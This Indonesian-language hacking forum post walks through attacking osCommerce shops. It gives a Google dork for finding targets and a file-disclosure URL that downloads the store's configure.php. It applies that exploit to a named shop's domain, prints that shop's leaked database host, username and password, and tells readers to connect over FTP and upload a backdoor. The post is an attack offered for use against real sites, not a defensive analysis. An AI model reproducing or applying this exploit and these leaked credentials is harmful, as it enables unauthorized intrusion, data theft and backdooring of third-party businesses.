Upload Backdoor di osCommerce

============================================================

#File Disclosure : admin/file_manager.php/login.php?action=download&filename=

#Dork : Powered by osCommerce

#Exploit : admin/file_manager.php/login.php?action=download&filename=/includes/configure.php

==============================================================</div>


Ok, sekarang kita cari targetnya dgn dork “Powered by osCommerce”

Sekarang kita cari target nya dengan memasukkan dork tadi ke google
Contoh target yang saya dapatkan :


<span style="color: red;"><div class="codeblock">
<div class="title">
Code:
</div>
<div class="body" dir="ltr">
<code>http://rsmjstore.com/admin/login.php</code></div>
</div>
</span>


utk percobaan kita pake trget itu...
Dan kita masuk admin page nya ya...

sekarang, kita pake exploitnya jadinya :

<span style="color: red;"><div class="codeblock">
<div class="title">
Code:
</div>
<div class="body" dir="ltr">
<code>http://rsmjstore.com/admin/file_manager.php/login.php?action=download&amp;filename=/includes/configure.php</code></div>
</div>
</span>

nah kita mendapatkan configure.php, lsg aja deh kita download <img alt="seringai" border="0" src="http://www.palembanghackerlink.org/images/smilies/ym/4.gif" style="vertical-align: middle;" title="seringai" />

Selanjutnya, setelah kita download kita buka menggunakan notepad, disitu akan keluar database dan password :

<span style="color: red;"><div class="codeblock">
<div class="title">
Code:
</div>
<div class="body" dir="ltr">
<code>('DB_SERVER', '10.6.171.62');
define('DB_SERVER_USERNAME', 'rsmjmaster');
define('DB_SERVER_PASSWORD', 'Cb81419');
define('DB_DATABASE', 'rsmjmaster');
define('USE_PCONNECT', 'false');
define('STORE_SESSIONS', 'mysql');
?&gt;</code></div>
</div>
</span>

Habis kita dptkan yg kyk gitu, marilah kita buka melalui FTP, di sini saya menggunakan FileZila,

Dan kita Upload backdoor kita

gag ngerti